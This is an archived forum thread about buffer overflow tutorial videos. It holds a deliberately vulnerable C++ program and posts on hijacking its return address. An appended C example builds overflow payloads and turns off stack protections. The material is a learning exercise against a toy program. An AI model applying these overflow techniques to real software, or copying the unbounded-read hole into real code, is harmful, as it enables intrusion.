Full Version: Buffer Overflow Video
kbnet
You will only understand this if you have watched the first guide to buffer overruns video by IDEspinner. If you haven't seen it then make sure you do!

Ok, so here is the code for the buffer overflow example:

#include <iostream>   // <iostream.h> is the pre-standard header MSVC 6 shipped; current compilers need <iostream>
#include <cstdio>     // getchar()
using namespace std;

// Never called from anywhere: the exercise is to reach it by overwriting the saved return address
int Hijack()
{
    cout << "This program flow should be HIJACKED!!!";
    getchar();
    return 0;
}

int Funct1()
{
    char var1[15];                                  // the stack buffer that gets overrun
    cout << &var1 << endl;                          // print the buffer's address so it can be found in the debugger
    cout << "_______________1234567890abcd" << endl; // ruler to count input bytes against the buffer
    cout << "Enter name:";
    cin >> var1;                                    // unbounded read: this is the deliberate overflow
    cout << var1 << endl;
    return 0;
}

int main()
{
    Funct1();
    getchar();
    return 0;
}

However, when I load the .exe into OllyDbg the Hijack method does not seem to be present in the file. I even did a string reference search in W32Dasm; it detects all the other strings in the methods, but nothing from the Hijack method.
However, if I reference the Hijack method in the main method then the strings are present and I can see the method in OllyDbg. So it seems that if the method is not referenced the compiler strips it out, because obviously it would never be executed under normal circumstances, which makes sense I suppose, as why would you program some code and never reference it?
However, I don't want to place the Hijack method in the main method, because this eliminates the whole point of the exercise (which is to force-execute the Hijack method using the buffer overflow technique).
Just wondering if anyone else has come across this? I'm using Microsoft Visual C++ 6. Is there some kind of option to prevent a method being stripped out even though it's not being referenced?

Cheers
Serhat
I had some problems finding it also, but in the end it turned out it was there.

Serhat
kbnet
Strange why W32Dasm doesn't pick up the strings. I will have another proper look through; if I still can't see it I'm coming back to get an offset from you.

Cheers
kiafaldorius
If you're using SP2?
IDEspinner
That is very weird that you don't see the int Hijack() function, but like the first responder pointed out, he found it eventually. I don't think it's likely the compiler stripped out what wasn't referenced; I honestly have never seen that.

This does bring out the fact that you are using MSVC++.

I don't know anyone who has managed to pull it off with the VC++ compiler, but that doesn't mean people haven't done it.

Personally, I recommend for the sake of learning that you just stick with the Dev-C++ compiler. It's free, and the goal here is to learn to do a basic overflow, not to bypass stack guards and such (yet).

But I'm sure the function is there. If you can't find it at all, jump on IRC; I'm always there to help. I have helped numerous people, so don't worry about it; just about everyone there would gladly help you.

QUOTE(kiafaldorius @ Oct 16 2004, 02:03 PM)
If you're using SP2?

And kia,
I know for a fact that in SP2 the return should still get overwritten.

kiafaldorius
Heh, I got mixed up between the VC++ compiler, which we got many complaints about not working (probably the compiler automatically includes/removes some stuff), and SP2, which a few people came in and complained about. Most were using Visual C++ as well.
InTuZ
The problem is clear.

You are trying to compile an application in which a function is never used.
So some compilers, like Dev-Cpp, won't compile unused functions into the EXE file.
Simply said: some compilers optimize the code.

Hope this helps :-)

So, but what about IDEspinner's third video tutorial, overrunning strcpy?

I have some problems there: I've compiled the app shown in IDEspinner's Tut3 with Dev-Cpp. If I try to exploit it, it always fails, because the RETN jump is always wrong and the stack addresses are very low. Can somebody help me?

here some photos about my problem:
http://mitglied.lycos.de/intuz/images/fail...loit_strcpy.gif
http://mitglied.lycos.de/intuz/images/fail...oit_strcpy1.gif
IDEspinner
Well InTuZ, your problem was a unique one. I wish I could tell you what's wrong, but honestly I don't know.

I compiled all of it with Dev-C++ as well...

I know Dev-C++ doesn't optimize code and remove functions; if it did, you could include every header file on startup and not worry about the size of the app.

And the second picture, you said you got
I'm not sure how to explain; it should in theory end in \x00 since your variables end in null, right?

At first I thought it's OK, 20, because you're not overwriting the last byte, but the variable that overwrites should end in null, shouldn't it???

Anyone who could explain this would help me out a lot.

[N0N4M3]
What is this exploit ???
:s
InTuZ
QUOTE(IDEspinner @ Oct 25 2004, 05:00 AM)
Well InTuZ, your problem was a unique one. I wish I could tell you what's wrong, but honestly I don't know.

I compiled all of it with Dev-C++ as well...

I know Dev-C++ doesn't optimize code and remove functions; if it did, you could include every header file on startup and not worry about the size of the app.

And the second picture, you said you got
I'm not sure how to explain; it should in theory end in \x00 since your variables end in null, right?

At first I thought it's OK, 20, because you're not overwriting the last byte, but the variable that overwrites should end in null, shouldn't it???

Anyone who could explain this would help me out a lot.

Yo IDEspinner,
yes of course it should jump to 00FFFFFF, but it doesn't, although I put the right RETN in the exploit source ("\xFF\xFF\xFF\x00").

So, Dev-Cpp v4.9.x "removes" (or won't compile in) functions that are unused, but you can fix the problem by using the function. Simple, huh?

But what the hell, I can't jump to the right place of the RETN address. And IDEspinner, can you please explain to me exactly what I am trying to exploit in your tutorial? The strcpy command, or where/how does the overrun start?
Sorry for my English, I hope somebody understands it.
IDEspinner
QUOTE
But what the hell, I can't jump to the right place of the RETN address. And IDEspinner, can you please explain to me exactly what I am trying to exploit in your tutorial? The strcpy command, or where/how does the overrun start?
Sorry for my English, I hope somebody understands it.


Well, for the first tutorial you are just learning the basics of a buffer overflow and what makes it possible: overwriting the return address and taking over the flow of the program.

The second one goes over coding, and shows that you can put your code into a variable with nothing but \x90 and such.

The final one ties them both together: you put the code in a variable and send it to the program, overwriting the return and completely finishing an exploit that could be valid in real life, well, not in Windows. Actually you would be sending your code and exploit over Winsock rather than the command line, so the concept is still there.
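As an added worked example (not code from the thread or from IDEspinner's videos), here is the first post's exercise rebuilt in C. It keeps Hijack() alive without ever calling it, which is the fix for kbnet's stripped-function problem, and it builds the overflow input with a function instead of by hand, so the little-endian return-address bytes and the null-byte question InTuZ ran into with "\xFF\xFF\xFF\x00" can be checked. Everything not on the page is an assumption: a 32-bit little-endian x86 build with optimisation and stack protection turned off, a distance of 28 bytes from var1 to the saved return address, and a target address of 0x00401000; for a real build both numbers must be read from the debugger, as the videos do.

```c
/* Added example, not part of the original thread. Assumes a 32-bit
 * little-endian x86 build with optimisation and stack protection off,
 * e.g.  gcc -m32 -O0 -fno-stack-protector -fno-pie -no-pie overflow.c
 * The distance from var1 to the saved return address (28 below) and
 * the target address (0x00401000) are placeholders to be taken from
 * the debugger; they are not values from the page. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>

void Hijack(void)
{
    puts("This program flow should be HIJACKED!!!");
    getchar();
}

/* Storing the address in a volatile global counts as a reference, so a
 * compiler or linker doing dead-code elimination (MSVC /OPT:REF, GNU
 * ld --gc-sections) must keep Hijack() even though nothing calls it. */
void (* volatile keep_hijack)(void) = Hijack;

void Funct1(void)
{
    char var1[15];                       /* the stack buffer that gets overrun */
    printf("%p\n", (void *)var1);        /* buffer address, to locate it in the debugger */
    puts("_______________1234567890abcd");
    printf("Enter name:");
    scanf("%s", var1);                   /* deliberately unbounded, like cin >> var1 */
    puts(var1);
}

/* Encode a 32-bit address in the byte order it must have in the input
 * stream to land in a saved return address on x86 (little-endian).
 * Returns the number of bytes written, always 4. */
size_t encode_ret(uint32_t addr, unsigned char out[4])
{
    out[0] = addr & 0xff;
    out[1] = (addr >> 8) & 0xff;
    out[2] = (addr >> 16) & 0xff;
    out[3] = (addr >> 24) & 0xff;
    return 4;
}

/* A zero byte anywhere but the last position ends a strcpy() early, and
 * a whitespace byte ends a cin >> / scanf("%s") read, so the remaining
 * address bytes never reach the stack. 0x00FFFFFF encodes to FF FF FF 00
 * and is usable: its only zero is the final byte, which strcpy copies as
 * the terminator. Returns the index of the first offending byte, or -1. */
int first_bad_byte(uint32_t addr)
{
    unsigned char b[4];
    encode_ret(addr, b);
    for (int i = 0; i < 3; i++)
        if (b[i] == 0 || isspace(b[i]))
            return i;
    return -1;
}

/* Build padding followed by the return address. 'dist' is the number of
 * bytes from the start of the buffer to the saved return address (buffer
 * size plus alignment padding plus the saved frame pointer), as measured
 * in the debugger. Returns the payload length, or 0 if 'out' is too small. */
size_t build_payload(size_t dist, uint32_t target, unsigned char *out, size_t cap)
{
    if (cap < dist + 4)
        return 0;
    memset(out, 'A', dist);
    encode_ret(target, out + dist);
    return dist + 4;
}

int main(void)
{
    unsigned char payload[64];
    size_t n = build_payload(28, 0x00401000u, payload, sizeof payload);
    for (size_t i = 0; i < n; i++)       /* print it in the \xNN form used in the exploit source */
        printf("\\x%02x", payload[i]);
    putchar('\n');
    Funct1();
    return 0;
}
```

On a current OS the bare exercise also runs into ASLR, stack cookies and a non-executable stack; the flags in the comment switch the compiler-side protections off for learning purposes, which is the same trade-off IDEspinner makes by recommending Dev-C++ over MSVC for the first attempt.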
Invision Power Board © 2001-2005 Invision Power Services, Inc.